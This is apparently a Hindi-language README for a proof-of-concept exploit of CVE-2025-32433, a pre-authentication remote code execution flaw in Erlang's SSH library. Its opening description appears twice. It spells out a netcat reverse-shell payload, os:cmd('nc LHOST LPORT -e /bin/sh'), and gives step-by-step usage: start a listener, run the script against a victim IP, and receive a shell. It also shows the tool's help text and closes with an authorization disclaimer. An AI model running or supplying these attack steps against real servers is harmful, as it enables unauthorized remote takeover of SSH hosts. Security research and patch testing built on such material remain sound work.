
CVE-2025-32433 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण, जो एर्लांग के SSH लाइब्रेरी में एक महत्वपूर्ण कमजोरी है, जो गलत प्रारूप वाले SSH_MSG_CHANNEL_REQUEST पैकेटों के माध्यम से पूर्व-प्रमाणित कोड निष्पादन की अनुमति देता है।
CVE-2025-32433 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट शोषण, एरलैंग की SSH लाइब्रेरी में एक गंभीर कमज़ोरी जो दुर्भावनापूर्ण SSH_MSG_CHANNEL_REQUEST पैकेट के माध्यम से पूर्व-प्रमाणित कोड निष्पादन की अनुमति देती है।
argparse के माध्यम से अंतर्निहित सहायता और उपयोगos:cmd("nc LHOST LPORT -e /bin/sh") का उपयोग करते हुए एरलैंग-शैली रिवर्स शेल पेलोडnc (Netcat) लिसनर22) तक नेटवर्क पहुंचअपना लिसनर शुरू करें आक्रमण बॉक्स पर:
nc -lvnp 4444
शोषण चलाएं:
python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
शेल का इंतज़ार करें जो आपके लिसनर से वापस कनेक्ट हो।
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]
Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell
optional arguments:
-h, --help show this help message and exit
-lh LHOST, --lhost LHOST
Local host/IP to receive the reverse shell
-lp LPORT, --lport LPORT
Local port to receive the reverse shell
-rh RHOST, --rhost RHOST
Target SSH server IP (default: 10.10.248.101)
-rp RPORT, --rport RPORT
Target SSH server port (default: 22)
इस कोड का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। कमज़ोरियों का अनधिकृत शोषण अवैध और अनैतिक है।